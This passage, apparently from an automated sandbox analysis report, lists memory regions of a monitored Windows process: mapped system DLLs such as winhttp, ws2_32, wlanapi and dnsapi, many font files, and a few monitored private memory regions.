filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")
Region:
id = 1755
start_va = 0x7ff9f9bb0000
end_va = 0x7ff9f9c56fff
monitored = 0
entry_point = 0x7ff9f9bc58d0
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 1756
start_va = 0x7ff9f9c60000
end_va = 0x7ff9f9d0cfff
monitored = 0
entry_point = 0x7ff9f9c781a0
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 1757
start_va = 0x7ff9f9ee0000
end_va = 0x7ff9fa15cfff
monitored = 0
entry_point = 0x7ff9f9fb4970
region_type = mapped_file
name = "combase.dll"
filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll")
Region:
id = 1758
start_va = 0x7ff9fa1d0000
end_va = 0x7ff9fa22afff
monitored = 0
entry_point = 0x7ff9fa1e38b0
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 1759
start_va = 0x7ff9fa230000
end_va = 0x7ff9fa34bfff
monitored = 0
entry_point = 0x7ff9fa2702b0
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 1760
start_va = 0x7ff9fba70000
end_va = 0x7ff9fbbf5fff
monitored = 0
entry_point = 0x7ff9fbabffc0
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 1761
start_va = 0x7ff9fbe10000
end_va = 0x7ff9fbfd0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 1763
start_va = 0x5b0000
end_va = 0x5bbfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "arlrdbd.ttf"
filename = "\\Windows\\Fonts\\ARLRDBD.TTF" (normalized: "c:\\windows\\fonts\\arlrdbd.ttf")
Region:
id = 1764
start_va = 0x5c0000
end_va = 0x5cdfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "baskvill.ttf"
filename = "\\Windows\\Fonts\\BASKVILL.TTF" (normalized: "c:\\windows\\fonts\\baskvill.ttf")
Region:
id = 1765
start_va = 0x5d0000
end_va = 0x5dbfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "bauhs93.ttf"
filename = "\\Windows\\Fonts\\BAUHS93.TTF" (normalized: "c:\\windows\\fonts\\bauhs93.ttf")
Region:
id = 1766
start_va = 0x890000
end_va = 0x8bdfff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000890000"
filename = ""
Region:
id = 1767
start_va = 0x5e0000
end_va = 0x5f4fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "bell.ttf"
filename = "\\Windows\\Fonts\\BELL.TTF" (normalized: "c:\\windows\\fonts\\bell.ttf")
Region:
id = 1768
start_va = 0x8e0000
end_va = 0x8f4fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "bellb.ttf"
filename = "\\Windows\\Fonts\\BELLB.TTF" (normalized: "c:\\windows\\fonts\\bellb.ttf")
Region:
id = 1769
start_va = 0xb90000
end_va = 0xba4fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "belli.ttf"
filename = "\\Windows\\Fonts\\BELLI.TTF" (normalized: "c:\\windows\\fonts\\belli.ttf")
Region:
id = 1770
start_va = 0xbb0000
end_va = 0xbc1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "bernhc.ttf"
filename = "\\Windows\\Fonts\\BERNHC.TTF" (normalized: "c:\\windows\\fonts\\bernhc.ttf")
Region:
id = 1771
start_va = 0xbd0000
end_va = 0xbf5fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "bkant.ttf"
filename = "\\Windows\\Fonts\\BKANT.TTF" (normalized: "c:\\windows\\fonts\\bkant.ttf")
Region:
id = 1772
start_va = 0xd00000
end_va = 0xd12fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "bod_b.ttf"
filename = "\\Windows\\Fonts\\BOD_B.TTF" (normalized: "c:\\windows\\fonts\\bod_b.ttf")
Region:
id = 1773
start_va = 0xd20000
end_va = 0xd34fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "bod_bi.ttf"
filename = "\\Windows\\Fonts\\BOD_BI.TTF" (normalized: "c:\\windows\\fonts\\bod_bi.ttf")
Region:
id = 1774
start_va = 0xd40000
end_va = 0xd54fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "bod_blai.ttf"
filename = "\\Windows\\Fonts\\BOD_BLAI.TTF" (normalized: "c:\\windows\\fonts\\bod_blai.ttf")
Region:
id = 1775
start_va = 0xd60000
end_va = 0xd71fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "bod_blar.ttf"
filename = "\\Windows\\Fonts\\BOD_BLAR.TTF" (normalized: "c:\\windows\\fonts\\bod_blar.ttf")
Region:
id = 1776
start_va = 0xd80000
end_va = 0xd92fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "bod_cb.ttf"
filename = "\\Windows\\Fonts\\BOD_CB.TTF" (normalized: "c:\\windows\\fonts\\bod_cb.ttf")
Region:
id = 1777
start_va = 0xda0000
end_va = 0xdb3fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "bod_cbi.ttf"
filename = "\\Windows\\Fonts\\BOD_CBI.TTF" (normalized: "c:\\windows\\fonts\\bod_cbi.ttf")
Region:
id = 1778
start_va = 0xdc0000
end_va = 0xdd3fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "bod_ci.ttf"
filename = "\\Windows\\Fonts\\BOD_CI.TTF" (normalized: "c:\\windows\\fonts\\bod_ci.ttf")
Region:
id = 1780
start_va = 0x560000
end_va = 0x573fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "bod_cr.ttf"
filename = "\\Windows\\Fonts\\BOD_CR.TTF" (normalized: "c:\\windows\\fonts\\bod_cr.ttf")
Region:
id = 1781
start_va = 0xde0000
end_va = 0xdf5fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "bod_i.ttf"
filename = "\\Windows\\Fonts\\BOD_I.TTF" (normalized: "c:\\windows\\fonts\\bod_i.ttf")
Region:
id = 1782
start_va = 0x1100000
end_va = 0x1116fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "bod_pstc.ttf"
filename = "\\Windows\\Fonts\\BOD_PSTC.TTF" (normalized: "c:\\windows\\fonts\\bod_pstc.ttf")
Region:
id = 1791
start_va = 0x5b0000
end_va = 0x5c3fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "bod_r.ttf"
filename = "\\Windows\\Fonts\\BOD_R.TTF" (normalized: "c:\\windows\\fonts\\bod_r.ttf")
Region:
id = 1792
start_va = 0x5d0000
end_va = 0x5f7fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "bookos.ttf"
filename = "\\Windows\\Fonts\\BOOKOS.TTF" (normalized: "c:\\windows\\fonts\\bookos.ttf")
Region:
id = 1793
start_va = 0xb90000
end_va = 0xbb5fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "bookosb.ttf"
filename = "\\Windows\\Fonts\\BOOKOSB.TTF" (normalized: "c:\\windows\\fonts\\bookosb.ttf")
Region:
id = 1794
start_va = 0x4460000
end_va = 0x455ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004460000"
filename = ""
Region:
id = 1795
start_va = 0xbc0000
end_va = 0xbe7fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "bookosbi.ttf"
filename = "\\Windows\\Fonts\\BOOKOSBI.TTF" (normalized: "c:\\windows\\fonts\\bookosbi.ttf")
Region:
id = 1796
start_va = 0x1120000
end_va = 0x1147fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "bookosi.ttf"
filename = "\\Windows\\Fonts\\BOOKOSI.TTF" (normalized: "c:\\windows\\fonts\\bookosi.ttf")
Region:
id = 1799
start_va = 0x7ff9f2810000
end_va = 0x7ff9f28d7fff
monitored = 0
entry_point = 0x7ff9f28513f0
region_type = mapped_file
name = "winhttp.dll"
filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll")
Region:
id = 1800
start_va = 0x8e0000
end_va = 0x8f9fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "bradhitc.ttf"
filename = "\\Windows\\Fonts\\BRADHITC.TTF" (normalized: "c:\\windows\\fonts\\bradhitc.ttf")
Region:
id = 1801
start_va = 0x560000
end_va = 0x569fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "britanic.ttf"
filename = "\\Windows\\Fonts\\BRITANIC.TTF" (normalized: "c:\\windows\\fonts\\britanic.ttf")
Region:
id = 1802
start_va = 0x570000
end_va = 0x587fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "brlnsb.ttf"
filename = "\\Windows\\Fonts\\BRLNSB.TTF" (normalized: "c:\\windows\\fonts\\brlnsb.ttf")
Region:
id = 1803
start_va = 0xd00000
end_va = 0xd17fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "brlnsdb.ttf"
filename = "\\Windows\\Fonts\\BRLNSDB.TTF" (normalized: "c:\\windows\\fonts\\brlnsdb.ttf")
Region:
id = 1804
start_va = 0xd20000
end_va = 0xd37fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "brlnsr.ttf"
filename = "\\Windows\\Fonts\\BRLNSR.TTF" (normalized: "c:\\windows\\fonts\\brlnsr.ttf")
Region:
id = 1805
start_va = 0x8c0000
end_va = 0x8cefff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "broadw.ttf"
filename = "\\Windows\\Fonts\\BROADW.TTF" (normalized: "c:\\windows\\fonts\\broadw.ttf")
Region:
id = 1806
start_va = 0xbf0000
end_va = 0xbfdfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "brushsci.ttf"
filename = "\\Windows\\Fonts\\BRUSHSCI.TTF" (normalized: "c:\\windows\\fonts\\brushsci.ttf")
Region:
id = 1807
start_va = 0xd40000
end_va = 0xd4dfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "bssym7.ttf"
filename = "\\Windows\\Fonts\\BSSYM7.TTF" (normalized: "c:\\windows\\fonts\\bssym7.ttf")
Region:
id = 1808
start_va = 0xd50000
end_va = 0xd63fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "califb.ttf"
filename = "\\Windows\\Fonts\\CALIFB.TTF" (normalized: "c:\\windows\\fonts\\califb.ttf")
Region:
id = 1809
start_va = 0x7ff9f99b0000
end_va = 0x7ff9f9a1afff
monitored = 0
entry_point = 0x7ff9f99c90c0
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 1810
start_va = 0x2c80000
end_va = 0x2e7ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002c80000"
filename = ""
Region:
id = 1811
start_va = 0x2d00000
end_va = 0x2dfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002d00000"
filename = ""
Region:
id = 1812
start_va = 0x7ff9f7d60000
end_va = 0x7ff9f7dbbfff
monitored = 0
entry_point = 0x7ff9f7d76f70
region_type = mapped_file
name = "mswsock.dll"
filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll")
Region:
id = 1813
start_va = 0xd70000
end_va = 0xd88fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "califi.ttf"
filename = "\\Windows\\Fonts\\CALIFI.TTF" (normalized: "c:\\windows\\fonts\\califi.ttf")
Region:
id = 1814
start_va = 0xd90000
end_va = 0xda9fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "califr.ttf"
filename = "\\Windows\\Fonts\\CALIFR.TTF" (normalized: "c:\\windows\\fonts\\califr.ttf")
Region:
id = 1815
start_va = 0xdb0000
end_va = 0xdc3fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "calist.ttf"
filename = "\\Windows\\Fonts\\CALIST.TTF" (normalized: "c:\\windows\\fonts\\calist.ttf")
Region:
id = 1816
start_va = 0xdd0000
end_va = 0xde4fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "calistb.ttf"
filename = "\\Windows\\Fonts\\CALISTB.TTF" (normalized: "c:\\windows\\fonts\\calistb.ttf")
Region:
id = 1817
start_va = 0x1150000
end_va = 0x1164fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "calistbi.ttf"
filename = "\\Windows\\Fonts\\CALISTBI.TTF" (normalized: "c:\\windows\\fonts\\calistbi.ttf")
Region:
id = 1818
start_va = 0x7ff9f1800000
end_va = 0x7ff9f1837fff
monitored = 0
entry_point = 0x7ff9f1818cc0
region_type = mapped_file
name = "iphlpapi.dll"
filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")
Region:
id = 1819
start_va = 0x7ff9f1840000
end_va = 0x7ff9f184afff
monitored = 0
entry_point = 0x7ff9f1841d30
region_type = mapped_file
name = "winnsi.dll"
filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll")
Region:
id = 1820
start_va = 0xdf0000
end_va = 0xdfefff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "calisti.ttf"
filename = "\\Windows\\Fonts\\CALISTI.TTF" (normalized: "c:\\windows\\fonts\\calisti.ttf")
Region:
id = 1821
start_va = 0x1170000
end_va = 0x117bfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "castelar.ttf"
filename = "\\Windows\\Fonts\\CASTELAR.TTF" (normalized: "c:\\windows\\fonts\\castelar.ttf")
Region:
id = 1822
start_va = 0x1180000
end_va = 0x11a7fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "censcbk.ttf"
filename = "\\Windows\\Fonts\\CENSCBK.TTF" (normalized: "c:\\windows\\fonts\\censcbk.ttf")
Region:
id = 1823
start_va = 0x11b0000
end_va = 0x11c4fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "centaur.ttf"
filename = "\\Windows\\Fonts\\CENTAUR.TTF" (normalized: "c:\\windows\\fonts\\centaur.ttf")
Region:
id = 1824
start_va = 0x11d0000
end_va = 0x11f8fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "century.ttf"
filename = "\\Windows\\Fonts\\CENTURY.TTF" (normalized: "c:\\windows\\fonts\\century.ttf")
Region:
id = 1825
start_va = 0x2840000
end_va = 0x2857fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "chiller.ttf"
filename = "\\Windows\\Fonts\\CHILLER.TTF" (normalized: "c:\\windows\\fonts\\chiller.ttf")
Region:
id = 1838
start_va = 0x5b0000
end_va = 0x5bdfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "colonna.ttf"
filename = "\\Windows\\Fonts\\COLONNA.TTF" (normalized: "c:\\windows\\fonts\\colonna.ttf")
Region:
id = 1839
start_va = 0x5c0000
end_va = 0x5d3fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "coopbl.ttf"
filename = "\\Windows\\Fonts\\COOPBL.TTF" (normalized: "c:\\windows\\fonts\\coopbl.ttf")
Region:
id = 1840
start_va = 0x5e0000
end_va = 0x5effff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "coprgtb.ttf"
filename = "\\Windows\\Fonts\\COPRGTB.TTF" (normalized: "c:\\windows\\fonts\\coprgtb.ttf")
Region:
id = 1841
start_va = 0x5f0000
end_va = 0x5fffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "coprgtl.ttf"
filename = "\\Windows\\Fonts\\COPRGTL.TTF" (normalized: "c:\\windows\\fonts\\coprgtl.ttf")
Region:
id = 1842
start_va = 0xb90000
end_va = 0xba0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "curlz___.ttf"
filename = "\\Windows\\Fonts\\CURLZ___.TTF" (normalized: "c:\\windows\\fonts\\curlz___.ttf")
Region:
id = 1844
start_va = 0x2a00000
end_va = 0x2adffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "kernelbase.dll.mui"
filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui")
Region:
id = 1845
start_va = 0x7ff9f1040000
end_va = 0x7ff9f1053fff
monitored = 0
entry_point = 0x7ff9f1041a50
region_type = mapped_file
name = "wlanradiomanager.dll"
filename = "\\Windows\\System32\\WlanRadioManager.dll" (normalized: "c:\\windows\\system32\\wlanradiomanager.dll")
Region:
id = 1846
start_va = 0x560000
end_va = 0x56cfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "elephnt.ttf"
filename = "\\Windows\\Fonts\\ELEPHNT.TTF" (normalized: "c:\\windows\\fonts\\elephnt.ttf")
Region:
id = 1847
start_va = 0x570000
end_va = 0x57dfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "elephnti.ttf"
filename = "\\Windows\\Fonts\\ELEPHNTI.TTF" (normalized: "c:\\windows\\fonts\\elephnti.ttf")
Region:
id = 1848
start_va = 0x580000
end_va = 0x58cfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "engr.ttf"
filename = "\\Windows\\Fonts\\ENGR.TTF" (normalized: "c:\\windows\\fonts\\engr.ttf")
Region:
id = 1849
start_va = 0x8e0000
end_va = 0x8eefff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "erasbd.ttf"
filename = "\\Windows\\Fonts\\ERASBD.TTF" (normalized: "c:\\windows\\fonts\\erasbd.ttf")
Region:
id = 1850
start_va = 0x7ff9f28e0000
end_va = 0x7ff9f2940fff
monitored = 0
entry_point = 0x7ff9f28e4b50
region_type = mapped_file
name = "wlanapi.dll"
filename = "\\Windows\\System32\\wlanapi.dll" (normalized: "c:\\windows\\system32\\wlanapi.dll")
Region:
id = 1851
start_va = 0x7ff9f1020000
end_va = 0x7ff9f1038fff
monitored = 0
entry_point = 0x7ff9f1022180
region_type = mapped_file
name = "bthradiomedia.dll"
filename = "\\Windows\\System32\\BthRadioMedia.dll" (normalized: "c:\\windows\\system32\\bthradiomedia.dll")
Region:
id = 1852
start_va = 0x8c0000
end_va = 0x8cefff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "erasdemi.ttf"
filename = "\\Windows\\Fonts\\ERASDEMI.TTF" (normalized: "c:\\windows\\fonts\\erasdemi.ttf")
Region:
id = 1853
start_va = 0xbb0000
end_va = 0xbc0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "eraslght.ttf"
filename = "\\Windows\\Fonts\\ERASLGHT.TTF" (normalized: "c:\\windows\\fonts\\eraslght.ttf")
Region:
id = 1854
start_va = 0x8f0000
end_va = 0x8fefff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "erasmd.ttf"
filename = "\\Windows\\Fonts\\ERASMD.TTF" (normalized: "c:\\windows\\fonts\\erasmd.ttf")
Region:
id = 1855
start_va = 0x7ff9f8670000
end_va = 0x7ff9f86b2fff
monitored = 0
entry_point = 0x7ff9f8684b50
region_type = mapped_file
name = "cfgmgr32.dll"
filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")
Region:
id = 1856
start_va = 0x7ff9f6e50000
end_va = 0x7ff9f6e76fff
monitored = 0
entry_point = 0x7ff9f6e57940
region_type = mapped_file
name = "devobj.dll"
filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll")
Region:
id = 1857
start_va = 0x7ff9f1000000
end_va = 0x7ff9f101dfff
monitored = 0
entry_point = 0x7ff9f1001690
region_type = mapped_file
name = "bluetoothapis.dll"
filename = "\\Windows\\System32\\BluetoothApis.dll" (normalized: "c:\\windows\\system32\\bluetoothapis.dll")
Region:
id = 1858
start_va = 0x5b0000
end_va = 0x5bbfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "felixti.ttf"
filename = "\\Windows\\Fonts\\FELIXTI.TTF" (normalized: "c:\\windows\\fonts\\felixti.ttf")
Region:
id = 1859
start_va = 0x5c0000
end_va = 0x5cffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "forte.ttf"
filename = "\\Windows\\Fonts\\FORTE.TTF" (normalized: "c:\\windows\\fonts\\forte.ttf")
Region:
id = 1860
start_va = 0xbd0000
end_va = 0xbf5fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "frabk.ttf"
filename = "\\Windows\\Fonts\\FRABK.TTF" (normalized: "c:\\windows\\fonts\\frabk.ttf")
Region:
id = 1861
start_va = 0x5d0000
end_va = 0x5f9fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "frabkit.ttf"
filename = "\\Windows\\Fonts\\FRABKIT.TTF" (normalized: "c:\\windows\\fonts\\frabkit.ttf")
Region:
id = 1862
start_va = 0xd00000
end_va = 0xd22fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "fradm.ttf"
filename = "\\Windows\\Fonts\\FRADM.TTF" (normalized: "c:\\windows\\fonts\\fradm.ttf")
Region:
id = 1863
start_va = 0xd30000
end_va = 0xd4cfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "fradmcn.ttf"
filename = "\\Windows\\Fonts\\FRADMCN.TTF" (normalized: "c:\\windows\\fonts\\fradmcn.ttf")
Region:
id = 1864
start_va = 0xd50000
end_va = 0xd71fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "fradmit.ttf"
filename = "\\Windows\\Fonts\\FRADMIT.TTF" (normalized: "c:\\windows\\fonts\\fradmit.ttf")
Region:
id = 1865
start_va = 0x560000
end_va = 0x582fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "frahv.ttf"
filename = "\\Windows\\Fonts\\FRAHV.TTF" (normalized: "c:\\windows\\fonts\\frahv.ttf")
Region:
id = 1866
start_va = 0xd80000
end_va = 0xda5fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "frahvit.ttf"
filename = "\\Windows\\Fonts\\FRAHVIT.TTF" (normalized: "c:\\windows\\fonts\\frahvit.ttf")
Region:
id = 1867
start_va = 0xdb0000
end_va = 0xdd0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "framdcn.ttf"
filename = "\\Windows\\Fonts\\FRAMDCN.TTF" (normalized: "c:\\windows\\fonts\\framdcn.ttf")
Region:
id = 1868
start_va = 0xb90000
end_va = 0xba1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "freescpt.ttf"
filename = "\\Windows\\Fonts\\FREESCPT.TTF" (normalized: "c:\\windows\\fonts\\freescpt.ttf")
Region:
id = 1869
start_va = 0x3050000
end_va = 0x324ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003050000"
filename = ""
Region:
id = 1870
start_va = 0x3100000
end_va = 0x31fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003100000"
filename = ""
Region:
id = 1871
start_va = 0xde0000
end_va = 0xdeefff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "frscript.ttf"
filename = "\\Windows\\Fonts\\FRSCRIPT.TTF" (normalized: "c:\\windows\\fonts\\frscript.ttf")
Region:
id = 1872
start_va = 0x1100000
end_va = 0x1114fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ftltlt.ttf"
filename = "\\Windows\\Fonts\\FTLTLT.TTF" (normalized: "c:\\windows\\fonts\\ftltlt.ttf")
Region:
id = 1873
start_va = 0x1120000
end_va = 0x1150fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "gara.ttf"
filename = "\\Windows\\Fonts\\GARA.TTF" (normalized: "c:\\windows\\fonts\\gara.ttf")
Region:
id = 1874
start_va = 0x1160000
end_va = 0x1190fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "garabd.ttf"
filename = "\\Windows\\Fonts\\GARABD.TTF" (normalized: "c:\\windows\\fonts\\garabd.ttf")
Region:
id = 1875
start_va = 0x7ff9f8460000
end_va = 0x7ff9f84aafff
monitored = 0
entry_point = 0x7ff9f84635f0
region_type = mapped_file
name = "powrprof.dll"
filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll")
Region:
id = 1876
start_va = 0x11a0000
end_va = 0x11cefff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "garait.ttf"
filename = "\\Windows\\Fonts\\GARAIT.TTF" (normalized: "c:\\windows\\fonts\\garait.ttf")
Region:
id = 1877
start_va = 0x11d0000
end_va = 0x11f2fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "gigi.ttf"
filename = "\\Windows\\Fonts\\GIGI.TTF" (normalized: "c:\\windows\\fonts\\gigi.ttf")
Region:
id = 1878
start_va = 0x4560000
end_va = 0x465ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004560000"
filename = ""
Region:
id = 1879
start_va = 0xbb0000
end_va = 0xbc0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "gil_____.ttf"
filename = "\\Windows\\Fonts\\GIL_____.TTF" (normalized: "c:\\windows\\fonts\\gil_____.ttf")
Region:
id = 1880
start_va = 0x5b0000
end_va = 0x5c0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "gilb____.ttf"
filename = "\\Windows\\Fonts\\GILB____.TTF" (normalized: "c:\\windows\\fonts\\gilb____.ttf")
Region:
id = 1881
start_va = 0x5d0000
end_va = 0x5e1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "gilbi___.ttf"
filename = "\\Windows\\Fonts\\GILBI___.TTF" (normalized: "c:\\windows\\fonts\\gilbi___.ttf")
Region:
id = 1882
start_va = 0x5f0000
end_va = 0x5fefff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "gilc____.ttf"
filename = "\\Windows\\Fonts\\GILC____.TTF" (normalized: "c:\\windows\\fonts\\gilc____.ttf")
Region:
id = 1883
start_va = 0x560000
end_va = 0x570fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "gili____.ttf"
filename = "\\Windows\\Fonts\\GILI____.TTF" (normalized: "c:\\windows\\fonts\\gili____.ttf")
Region:
id = 1884
start_va = 0x8e0000
end_va = 0x8f1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "gillubcd.ttf"
filename = "\\Windows\\Fonts\\GILLUBCD.TTF" (normalized: "c:\\windows\\fonts\\gillubcd.ttf")
Region:
id = 1885
start_va = 0x7ff9f16d0000
end_va = 0x7ff9f16e5fff
monitored = 0
entry_point = 0x7ff9f16d19f0
region_type = mapped_file
name = "dhcpcsvc6.dll"
filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll")
Region:
id = 1886
start_va = 0x7ff9f16b0000
end_va = 0x7ff9f16c9fff
monitored = 0
entry_point = 0x7ff9f16b2430
region_type = mapped_file
name = "dhcpcsvc.dll"
filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll")
Region:
id = 1887
start_va = 0xbd0000
end_va = 0xbe1fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "glecb.ttf"
filename = "\\Windows\\Fonts\\GLECB.TTF" (normalized: "c:\\windows\\fonts\\glecb.ttf")
Region:
id = 1888
start_va = 0xd00000
end_va = 0xd14fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "glsnecb.ttf"
filename = "\\Windows\\Fonts\\GLSNECB.TTF" (normalized: "c:\\windows\\fonts\\glsnecb.ttf")
Region:
id = 1889
start_va = 0xd20000
end_va = 0xd41fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "gothic.ttf"
filename = "\\Windows\\Fonts\\GOTHIC.TTF" (normalized: "c:\\windows\\fonts\\gothic.ttf")
Region:
id = 1890
start_va = 0xd50000
end_va = 0xd6ffff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "gothicb.ttf"
filename = "\\Windows\\Fonts\\GOTHICB.TTF" (normalized: "c:\\windows\\fonts\\gothicb.ttf")
Region:
id = 1891
start_va = 0xd70000
end_va = 0xd91fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "gothicbi.ttf"
filename = "\\Windows\\Fonts\\GOTHICBI.TTF" (normalized: "c:\\windows\\fonts\\gothicbi.ttf")
Region:
id = 1892
start_va = 0x560000
end_va = 0x584fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "gothici.ttf"
filename = "\\Windows\\Fonts\\GOTHICI.TTF" (normalized: "c:\\windows\\fonts\\gothici.ttf")
Region:
id = 1893
start_va = 0x5b0000
end_va = 0x5c3fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "goudos.ttf"
filename = "\\Windows\\Fonts\\GOUDOS.TTF" (normalized: "c:\\windows\\fonts\\goudos.ttf")
Region:
id = 1894
start_va = 0x7ff9f6ea0000
end_va = 0x7ff9f6f49fff
monitored = 0
entry_point = 0x7ff9f6ec7910
region_type = mapped_file
name = "dnsapi.dll"
filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")
Region:
